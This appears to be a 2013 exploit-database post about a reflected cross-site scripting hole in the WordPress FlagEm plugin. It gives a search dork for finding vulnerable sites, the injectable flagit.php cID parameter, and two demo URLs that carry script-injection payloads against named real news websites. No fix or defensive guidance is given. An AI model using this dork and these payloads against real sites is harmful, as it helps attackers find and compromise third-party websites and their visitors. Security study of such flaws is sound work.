WordPress FlagEm plugin Cross-Site Scripting Vulnerabilities
2013-07-22 13:10:58Inviato da: irist.ir
#################################
# Iranian Exploit DataBase
# http://iedb.ir
#################################
# Exploit Title : WordPress FlagEm plugin Cross-Site Scripting Vulnerabilities
# Author : Iranian Exploit DataBase
# Discovered By : IeDb
# Email : [email protected]
# Home : http://iedb.ir
# Software Link : http://wordpress.org/
# Security Risk : High
# Tested on : Linux
# Dork : inurl:/plugins/FlagEm/
#################################
# Exploit :
# [TarGeT]/wp-content/plugins/FlagEm/flagit.php?cID=[Xss]
# Dem0 :
# http://multimedia.timeslive.co.za/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script>
# http://www.blogs.dispatch.co.za/dialogues/wp-content/plugins/FlagEm/flagit.php?cID=69387"><script>alert(/IeDb.Ir/)</script>
#################################
# Exploit Archive = http://www.iedb.ir/exploits-269.html
#################################
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.